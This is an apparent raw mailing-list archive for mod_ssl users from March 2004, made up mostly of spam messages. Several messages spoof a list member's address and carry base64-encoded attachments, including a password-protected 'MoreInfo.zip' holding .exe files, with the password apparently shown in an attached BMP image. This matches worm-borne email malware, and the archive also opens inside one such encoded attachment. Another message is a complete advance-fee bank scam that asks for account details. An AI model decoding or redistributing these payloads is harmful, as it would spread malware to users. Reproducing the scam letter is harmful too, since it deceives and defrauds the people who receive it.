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

----------vtjupnfjmunwdchjjeuy--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 18 17:31:52 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D68D3A895E; Thu, 18 Mar 2004 17:31:52 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from evanbrown.org (pcp04068535pcs.sanarb01.mi.comcast.net [68.40.174.140])
	by master.modssl.org (Postfix) with SMTP id 38DB3A8934
	for ; Thu, 18 Mar 2004 17:31:51 +0100 (CET)
Date: Thu, 18 Mar 2004 11:31:42 -0500
To: modssl-users@modssl.org
Subject: Re: Incoming Fax
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users






______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From papakoko2003@yahoo.co.uk  Thu Mar 18 19:17:01 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from 2mails2674.com (host81-136-40-148.in-addr.btopenworld.com [81.136.40.148])
	by master.modssl.org (Postfix) with SMTP id 8F836A8938
	for ; Thu, 18 Mar 2004 19:16:39 +0100 (CET)
From: "joshua mbeky" 
Reply-To: joshuambeky@yahoo.co.uk
To: modssl-users-l@master.modssl.org
Date: Thu, 18 Mar 2004 18:17:00 +0000
Subject: urgent
X-Mailer: Microsoft Outlook Express 5.00.2919.6900 DM
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Message-Id: <20040318181639.8F836A8938@master.modssl.org>

FROM=3A Joshua Mbeky
Email=3A joshuambeky=40yahoo=2Eco=2Euk

Dear Sir=2FMadam=2C
I have picked-up the trust and courage to write you this letter with
divine
confidence that you are a reliable and honest person who will be
capable for
this important business transaction believing also that you will never
let
me down either now or in the future=2E

My name is Mr=2EJoshua Mbeky=2E a senior Auditing Officer with the STANDARD
BANK OF
SOUTH AFRICA =2EThere is an account opened in this bank in 1980 and since
1996
nobody has operated on this account again=2E After going through some old
files in the records=2C I discovered that if I do not remit this money
out
urgently it would be forfeited to the government as dormant account=2E
The
owner of this account is Mr=2EJohn Hixon=2C a foreigner=2C he was a miner at
Kruger Gold Company=2C a geologist by profession=2C and he died since 1996
in a
plane crash=2E No other person knows about this account or anything
concerning
it=2C the account has no other beneficiary and my investigation proved to
me
as well that this company does not know anything about this account and
the
amount involved would not be disclose untill an intrest is shown I want
to
transfer this sum into a safe foreign account abroad=2E I am contacting
you
based on the fact that you are a foreigner because this money ca!
n only be approved for payment to a foreigner=2E I know that this
proposal
will come to you as a surprise as we don't know ourselves before=2E
Although
we will still have to meet to sign some agreement before the final
transfer
of the fund into any of your designated bank account=2E I have
involved
a very senior official in the operational department=2C and we have
agreed
that after the transfer of the money into your account=2C you shall be
entitled to 30% of the total sum=2C my colleagues and I will have 60%
while
10% will be used to reimburse any expenses incurred=2E
All necessary precautions have been taken to ensure a risk free
situation on
the side of both parties=2E Please note that this deal can only take
place on
the following conditions=3B
1=2E You will provide the bank account and other relevant
particulars=2Finformation for easy and onward Remittance of the fund=2E
2=2E Absolute confidentiality and sincerity will be required and
guaranteed=2C
considering our positions in the bank=2E
3=2E Assurance that our own share will be released to us in good faith
when
this money finally gets into your account=2E
All things being equal=2C this transaction will be within 10 working days
as
soon as we hear from you=2E Please treat with utmost confidentialit! y=2E
Contact me as quickly as possible=2E Thanks and God bless you=2E Expecting
your
urgent response vie email=2E

Best Regards=2C
Joshua Mbeky




From owner-modssl-users@modssl.org  Thu Mar 18 20:01:53 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 24F17A895E; Thu, 18 Mar 2004 20:01:53 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from student-vr4fcza.org (ip111-206.adsl.wplus.ru [195.131.111.206])
	by master.modssl.org (Postfix) with SMTP id 7D4E8A8934
	for ; Thu, 18 Mar 2004 20:01:51 +0100 (CET)
Date: Thu, 18 Mar 2004 21:59:14 +0300
To: modssl-users@modssl.org
Subject: Forum notify
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users






______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 18 20:32:45 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3EE57A895E; Thu, 18 Mar 2004 20:32:45 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from davidh.org (r171h138.dixie-net.com [64.89.171.138])
	by master.modssl.org (Postfix) with SMTP id 35280A8934
	for ; Thu, 18 Mar 2004 20:32:42 +0100 (CET)
Date: Thu, 18 Mar 2004 13:32:37 -0600
To: modssl-users@modssl.org
Subject: Request response
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------wcfmmnsaoohmwsugtagq"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------wcfmmnsaoohmwsugtagq
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


More info in attach





Password  -  





----------wcfmmnsaoohmwsugtagq
Content-Type: image/bmp; name="ahbksoypef.bmp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="ahbksoypef.bmp"
Content-ID: 

Qk22CQAAAAAAADYAAAAoAAAAPwAAABMAAAABABAAAAAAAIAJAAAAAAAAAAAAAAAAAAAAAAAA
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9/AAD/f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//38AAP9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//fwAA/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9/AAD/f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//38AAP9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//38gKyAr/3//f/9/slsgKyArtF//f/9/3HeRVyAr
aUO1Y/9//39pQyArICsgKyArICv/f/9/slsgKyArtF//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//fwAA/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//fyArICv/f/9/
t2cgK9hr2GsgK7Vj/3+RVyAr3HfYayArtWP/f7RfICvYa/9//3//f/9/t2cgK9hr2GsgK7Vj
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/AAD/f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9/ICsgK/9//3+PUyAr/3//fyArj1P/f/9//3//f/9/ICtpQ/9//XcgK2lD
3Hf/f/9//3+PUyAr/3//fyArj1P/f/9//3//f/9//3//f/9//3//f/9//3//f/9//38AAP9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//38gKyAr/3//fyArICv/f/9/ICsgK/9/
/3//f/9//38gKyAr/3//f9hrICtpQ/9//3//fyArICv/f/9/ICsgK/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//fwAA/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//fyAr
ICv/f/9/ICsgK/9//38gKyAr/3//f/9//3/YayArslv/f/9//3+RVyArkVf/f/9/ICsgK/9/
/38gKyAr/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/AAD/f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9/ICsgK/9//38gKyAr/3//fyArICv/f/9//39sSyArbEv/f/9/
/3//f/9/bEsgK9hr/38gKyAr/3//fyArICv/f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/38AAP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f5FX/38gKyAr/3//fyArICv/f/9/
ICsgK/9//3//f/9/t2cgK7Jb/3//f/9//3/bcyAraUP/fyArICv/f/9/ICsgK/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//fwAA/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
ICuPUyArICv/f/9/j1MgK/9//38gK49T/3//f/9//3//fyArICv/f/9//3//f/9/ICsgK/9/
j1MgK/9//38gK49T/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/AAD/f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3/cd5FXICsgK/9//3+1YyAr2GvYayArtWP/f7JbICvcd9tz
ICuRV/9/bEsgK9x33HcgK7Rf/3+1YyAr2GvYayArtWP/f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//38AAP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3+yWyAr/3//f/9/
tF8gKyArtF//f/9/3HeyWyArICuyW/9//3/cd49TICsgK7Rf/3//f/9/tF8gKyArtF//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//fwAA/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/AAD/f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//38AAP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//fwAA/3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
AAA=

----------wcfmmnsaoohmwsugtagq
Content-Type: application/octet-stream; name="MoreInfo.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="MoreInfo.zip"

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
